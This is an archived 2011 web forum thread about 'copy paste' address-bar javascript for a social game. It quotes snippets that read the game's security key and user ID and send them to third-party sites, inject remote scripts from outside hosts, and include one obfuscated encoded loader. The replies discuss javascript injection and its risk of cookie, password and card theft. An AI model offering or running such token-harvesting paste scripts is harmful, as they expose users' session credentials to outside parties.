devWhiz Posted June 13, 2011 Share Posted June 13, 2011 can you guys point me in the right direction to where I could learn how to write a copy paste script similar to this http://mobstereffect.com/propertycalcfb javascript: alert("The Mobsters Game should now take up the entire window.\n\t\t When window loads Follow Step4"); location.href="http://mobsters-fb-apache-dynamic-lb.playdom.com/prod_facebook/facebook/mobsters_v1/facebook_iframe.php?action=tab&target=3"; javascript: var a=SECURITY_KEY; var b=USER_ID; if(confirm("Success!!\nClick OK to sync your account with MobsterEffect.com")){ location.href="http://www.mobstereffect.com/syncfb.php?next=propertycalcfb&fid="+b+"&fkey="+a; } javascript:function%20b(){a=document.createElement('script');a.src='http://mobstereffect.com/calc.js.php?next=propertycalc&';document.getElementsByTagName('body')[0].appendChild(a);}b(); also on http://www.sumob.com/?i=iPlayCalculator javascript:a=function(t,f,i,x,e,d){p=new Array();for(u=0;u<x.length;u+=2)p[t[u/2]]=x.substr(u,2);for(u=0;u<x.length/2;u++){q=p[u];if(p[u]+p[u+1]=='5c79'){q='5c'+i+f+d+'6e';u++;}if(p[u]+p[u+1]=='5c7a'){q='20';u++;}if(p[u]+p[u+1]=='5c78'){q='09';u++;}e+=i+f+d+q;}z=setInterval('y=setInterval(\''+e+';clearInterval(y);'+'\');clearInterval(z)')}('85/71/27/109/69/24/106/56/35/73/57/82/47/75/54/15/46/108/16/30/96/80/25/51/12/63/4/104/83/89/74/7/107/50/88/26/45/100/17/29/102/87/3/99/23/11/67/20/94/28/98/18/111/78/91/60/70/53/33/58/101/31/22/43/32/39/6/38/90/81/37/66/76/55/13/8/34/44/5/77/10/19/97/68/42/95/72/103/86/59/105/52/84/61/92/48/62/2/9/65/110/41/64/1/36/40/79/0/49/21/93/14/'.split('/'),'u','\\','2f2f6c6d70436e297273292f286d7464746f79613f6f68722e6363724a6f7565646354696e612e28684d6f4d646474706a642b61292e6c2e3a702e3b743d6e6d64656d746f6d61686f27626e636575623b70277465732f2e416161695373732772647427286c3d3d6545636473652e6f','','00') javascript:function b(){d=document;d.body.appendChild(a=d.createElement('script'));a.src='http://sumob.com/JS/AMToolsO.js?'+Math.random()}b(); He encoded that, and this http://go4uteam.com/propcalc javascript:function b(){a=document.createElement('script');a.src='http://go4uteam.com/js/calc.js?';document.getElementsByTagName('body')[0].appendChild(a);}b(); what these copy paste scripts do is, you open up the certain myspace application, put the code in the toolbar and hit enter, and it finds the tokens for the application and connects to their tools that they have on their site, where could I go to learn how to write these copy paste scripts to do the same thing and connect to my site to use my tools? Thanks! Link to comment https://forums.phpfreaks.com/topic/239182-javascript-copy-paste-script/ Share on other sites More sharing options...
RussellReal Posted June 13, 2011 Share Posted June 13, 2011 what you're referring to as "copy past scripts" is not really that, its regular old javascript, which is getting injected into the page, called "JavaScript Injection", or simply "JSI".. This is technically a form of maliciousness, but it can only affect whatever is on the page at this moment, it can, however, trick the browser into referring the user to another page which requires referrers to match up, that amongst other things like ad blocking, AJAX Referrer spoofing.. Using somebody else's JSI could lead to: stealing sensitive information from cookies and password forms, snooping on the content of the page, credit card theft, amongst other things, especially with browsers like chrome automatically filling in credit card information on focus and selection of a credit-card related field.. but to get back on point about your question, can you make this? Sure, if you know anything about javascript.. The only real rule you need to remember about javascript injection.. Is. Rule: If anything you put in the url, returns any data to the "JavaScript:" portion of the url, it will then try and redirect you to that page.. An example of BAD JSI E.X.: javascript:(Math.random()*11); that will send you to a page: "10" which will most likely be a blank page.. or page not found GOOD JSI (lol, how ironic is that phrase) E.X.: javascript:void(var x = 11, var y = Math.random() * x, alert("Random * "+x+" = "+y)); void() will always return nothing.. Link to comment https://forums.phpfreaks.com/topic/239182-javascript-copy-paste-script/#findComment-1228987 Share on other sites More sharing options...
vague312 Posted June 16, 2011 Share Posted June 16, 2011 Clue, RussellReal is correct. its just plain jane javascript that scrapes the players app information. my MS & FB .js scripts have .php spliced in serverside. things have been busy so i havent had the chance to reply back to your pm on my forums. ---Vague Link to comment https://forums.phpfreaks.com/topic/239182-javascript-copy-paste-script/#findComment-1230317 Share on other sites More sharing options...
TibTibs Posted August 22, 2011 Share Posted August 22, 2011 Hey, that's my encoded script... Brad! lol. Link to comment https://forums.phpfreaks.com/topic/239182-javascript-copy-paste-script/#findComment-1260401 Share on other sites More sharing options...
TibTibs Posted August 22, 2011 Share Posted August 22, 2011 Quote This is technically a form of maliciousness, but it can only affect whatever is on the page at this moment, it can, however, trick the browser into referring the user to another page which requires referrers to match up, that amongst other things like ad blocking, AJAX Referrer spoofing.. Using somebody else's JSI could lead to: stealing sensitive information from cookies and password forms, snooping on the content of the page, credit card theft, amongst other things, especially with browsers like chrome automatically filling in credit card information on focus and selection of a credit-card related field.. On that note... There is also security in using JSI, for sites like mine, who help users by making tools for their game, it allows me to access their game security tokens and myspace ID, without directly asking for and using (and possibly storing) their myspace login. This allows for many useful things, such as calculating what it will take for a user to achieve a certain income within their game. I do agree with you that there are many malicious sites and developers who use this for their benefit. On another note, if web browsers and developers were smart, they would store credit card numbers in a password field, and have a verify field, just like most sites do for a password. This way, when it is autofilled, even if someone tries to use JSI to take the CCN, it would just be a bunch of astrix. Another couple options for JSI besides using the void() function are eval() which .. triggers a some virus programs, and just creating a blank function and running it... such as function b(){content to be run}b(); And last but not least, setInterval() and setTimeout() work as well. Link to comment https://forums.phpfreaks.com/topic/239182-javascript-copy-paste-script/#findComment-1260405 Share on other sites More sharing options...
RussellReal Posted September 23, 2011 Share Posted September 23, 2011 sorry for replying so late, been really busy lately.. I'd like to point out, that JSI on a password field, does yield the correct information, not asterisks, unless I read you wrong. Again sorry late reply lol. *feels like a post necromancer* Link to comment https://forums.phpfreaks.com/topic/239182-javascript-copy-paste-script/#findComment-1272107 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.